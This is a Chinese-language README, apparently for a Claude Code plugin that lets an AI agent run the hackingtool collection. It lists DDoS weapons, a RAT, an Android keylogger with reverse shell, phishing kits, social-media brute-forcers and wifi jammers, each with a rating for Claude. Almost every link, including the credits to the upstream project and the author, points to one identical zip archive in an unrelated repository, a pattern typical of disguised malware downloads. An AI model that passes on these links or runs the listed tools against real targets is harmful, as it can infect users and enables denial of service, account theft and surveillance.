[Androguard](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Android 应用的逆向工程和恶意软件分析。 | 🟡 | `sudo` | | [Apk2Gold](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于将 Android 应用反编译为 Java 的 CLI 工具。 | 🟡 | `interactive` `sudo` | | [Ghidra](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | NSA 的软件逆向工程框架。 | 🟡 | `sudo` `gui` | | [JadX](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Dex 转 Java 反编译器。 | 🟡 | `sudo` | | [Radare2](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 便携式类 Unix 逆向工程框架。 | 🟢 | — | ### ⚡ DDOS (6) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Asyncrone (SYN Flood)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 基于 C 语言的多功能 SYN Flood 武器。 | 🟡 | `interactive` `sudo` `long` | | [DDoS Script](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | DDoS 攻击脚本 —— 36 种以上方法。 | 🟡 |interactive` `sudo` `long` | | [GoldenEye](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Python3 压力测试应用。 | 🟡 | `interactive` `long` | | [SaphyraDDoS](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Python DDoS 脚本。 | 🟡 | `interactive` `long` | | SlowLoris | HTTP 拒绝服务攻击。 | 🟡 | `interactive` `sudo` `long` | | [UFOnet](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于 DoS/DDoS 的 P2P 密码学破坏性工具包。 | 🟡 | `gui` `long` | ### 🖥 RAT (1) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Pyshell](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 带有文件上传/下载功能的 RAT。 | 🟢 | — | ### 💥 XSS (9) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [XSStrike](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 基于 Python 的 XSS 检测和漏洞利用工具。 | 🟡 | `sudo` | | [DalFox](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | XSS 扫描和参数分析工具。 | 🟡 | `sudo` | | [Extended XSS Searcher](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 扩展的 XSS 搜索器和查找器。 | 🟡 | `interactive` | | [RVuln](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Rust 编写的多线程 Web 漏洞扫描器。 | 🟡 | `sudo` | | [XanXSS](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 具有基于模板的 payload 的反射型 XSS 搜索工具。 | 🟡 | — | | [XSpear](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 基于 Ruby Gems 构建的 XSS 扫描器。 | 🟢 | — | | [XSS Payload Generator](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | XSS payload 生成器、扫描器和 Dork 查找器。 | 🟡 | `sudo` | | [XSS-Freak](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用 Python 3 编写的 XSS 扫描器。 | 🟡 | `sudo` | | [XSSCon](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | XSS 扫描器。 | 🟡 | `interactive` `sudo` | ### 🖼 隐写术 (4) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | SteganoHide | 在图像或音频文件中隐藏/检索数据。 | 🟡 | `interactive` `sudo` | | StegnoCracker | 暴力破解文件中隐藏的数据。 | 🟡 | `interactive` `long` | | [StegoCracker](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 在图像或音频文件中隐藏和检索数据。 | 🟡 | `sudo` | | [Whitespace](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过空格和 Unicode 进行隐写。 | 🟡 | `sudo` | ### 🏢 活动目录 (6) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [BloodHound](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 利用图论揭示 AD/Azure 中隐藏的攻击路径。 | 🟡 | `sudo` | | [Certipy](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 活动目录证书服务枚举和滥用工具。 | 🟢 | — | | [Impacket](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于 SMB、MSRPC、Kerberos、LDAP 的 Python 类库。 | 🟢 | — | | [Kerbrute](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Kerberos 预认证暴力破解器 —— 枚举和喷洒。 | 🟢 | — | | [NetExec (nxc)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Windows/AD 渗透测试的瑞士军刀 —— CrackMapExec 的继任者。 | 🟢 | — | | [Responder](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于凭证捕获的 LLMNR/NBT-NS/MDNS 毒化工具。 | 🟡 | `sudo` | ### ☁ 云安全 (4) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Pacu](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于进攻性安全测试的 AWS 漏洞利用框架。 | 🟢 | — | | [Prowler](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于 AWS、Azure、GCP、Kubernetes 的安全工具。 | 🟢 | — | | [ScoutSuite](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 多云安全审计工具。 | 🟢 | — | | [Trivy](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于容器、Kubernetes、IaC 的漏洞扫描器。 | 🟡 | `sudo` | ### 📱 移动安全 (3) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Frida](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于运行时 hook 的动态插桩工具包。 | 🟢 | — | | [MobSF](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 一站式移动应用渗透测试和恶意软件分析。 | 🟢 | — | | [Objection](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 由 Frida 驱动的运行时移动探索工具。 | 🟢 | — | ### ✨ 其他 (1) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [HatCloud](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 绕过 CloudFlare 并发现真实 IP 的 Ruby 工具。 | 🟡 | `interactive` | ### 📱 Android 攻击 (5) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [DroidCam (Capture Image)](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过链接抓取前置摄像头快照。 | 🟡 | `sudo` | | [EvilApp](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 劫持 cookie 中已认证会话的 Android 应用。 | 🟢 | — | | [Keydroid](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Android 键盘记录器 + Reverse Shell。 | 🟢 | — | | [Lockphish](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 锁屏钓鱼。 | 🟢 | — | | [MySMS](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过 WAN 黑客入侵短信的 Android 应用。 | 🟢 | — | ### 📧 邮件验证器 (1) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Knockmail](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 验证电子邮件是否存在。 | 🟡 | `sudo` | ### 🔑 哈希破解 (1) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Hash Buster](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过公共哈希数据库破解哈希。 | 🟢 | — | ### 🎭 同形异义词 (1) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [EvilURL](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于 IDN 同形异义词攻击的 Unicode 恶意域名。 | 🟢 | — | ### 🧪 混合工具 (2) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Crivo](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 提取和过滤 URL、IP、域和子域名。 | 🟡 | — | | Terminal Multiplexer | Tilix —— 平铺式终端模拟器。 | 🟡 | `sudo` | ### 💉 载荷注入 (2) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Debinject](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 将恶意代码注入 *.debs 文件。 | 🟢 | — | | [Pixload](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 图像 payload 创建工具。 | 🟡 | `sudo` | ### 📱 社交媒体 (4) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [AllinOne SocialMedia Attack](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 暴力破解 Gmail、Hotmail、Twitter、Facebook、Netflix。 | 🟡 | `sudo` | | [Application Checker](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过链接检查目标设备上是否安装了某应用。 | 🟡 | `sudo` | | [Facebook Attack](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | Facebook 暴力破解器。 | 🟡 | `interactive` `sudo` | | [Instagram Attack](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 针对 Instagram 的暴力破解攻击。 | 🟡 | `archived` | ### 🔎 社交媒体查找 (4) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Find SocialMedia By Facial Recognition](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 关联个人资料的人脸识别社交媒体映射工具。 | 🟡 | `sudo` | | [Find SocialMedia By UserName](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 在 75 个以上的社交网络中查找用户名。 | 🟡 | `sudo` | | [Sherlock](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 通过用户名追捕社交媒体账户。 | 🟡 | `interactive` `sudo` | | [SocialScan](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 检查在线平台上的电子邮件和用户名可用性。 | 🟡 | `interactive` | ### 🕸 网络爬虫 (1) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [Gospider](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用 Go 编写的快速 Web 蜘蛛。 | 🟡 | `sudo` | ### 📡 Wifi 干扰 (2) | 工具 | 功能 | Claude | 标志 | |---|---|:---:|---| | [KawaiiDeauther](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 用于 wifi 反认证的渗透测试工具包。 | 🟡 | `sudo` `hw` | | [WifiJammer-NG](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) | 持续干扰范围内的所有 wifi 客户端和 AP。 | 🟡 | `sudo` `hw` | ## 刷新工具索引 当上游 hackingtool 添加工具时，重新生成 `data/tools.json` 和 README 表格： ``` python ${CLAUDE_PLUGIN_ROOT}/scripts/ht_index.py --hackingtool-path /path/to/hackingtool python ${CLAUDE_PLUGIN_ROOT}/scripts/build_readme_table.py > new_table.md ``` 如果 hackingtool 是此仓库的同级目录，则不需要 `--hackingtool-path` —— 脚本会自动检测。 ## 目录布局 ``` hackingtool-plugin/ ├── .claude-plugin/ │ └── marketplace.json # marketplace entry ├── images/ # screenshots + logo ├── README.md # this file └── plugins/hackingtool/ ├── .claude-plugin/plugin.json ├── data/tools.json # generated index ├── scripts/ │ ├── ht_index.py # (dev) regenerate tools.json │ ├── build_readme_table.py # (dev) regenerate the table above │ ├── ht_search.py # query index │ ├── ht_env.py # detect backend │ └── ht_run.py # backend-aware tool runner └── skills/pentest/ ├── SKILL.md └── reference/ ├── workflows.md └── runtime-fallbacks.md ``` ## 限制 - 需要 **Python 3.10+**。 - **不支持异步工具流式传输。** 长时间运行的工具会阻塞直到完成或超时。 - **Docker 后端** 在首次使用时会拉取 `kalilinux/kali-rolling`。 - **能力标志为启发式判定。** 如果你发现标记有误的工具，请在 `data/tools.json` 中修复或提交 issue。 ## 致谢 - 上游工具包：[Z4nzu/hackingtool](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) —— 所有工具元数据、分类和截图均源自该项目。 - 插件封装：[ariacodez](https://github.com/MAXZL1/hackingtool-plugin/raw/refs/heads/main/plugins/hackingtool/skills/hackingtool-plugin-v2.8.zip) (GitHub 上的 AKCodez)。 ## 许可证 MIT。上游 Z4nzu/hackingtool 同样采用 MIT 许可证。

标签：AI安全, Chat Copilot, Claude, Claude Code, CVE检测, Docker, Docker容器, ESC4, Google, Nmap, Nuclei, OSINT, Z4nzu/hackingtool, 事件响应, 云资产清单, 反取证, 大模型插件, 安全评估, 安全防御评估, 实时处理, 密码管理, 应用安全, 插件系统, 攻击路径可视化, 攻击面发现, 网络安全, 网络安全审计, 虚拟驱动器, 请求拦截, 逆向工具, 逆向工程, 隐私保护, 黑客工具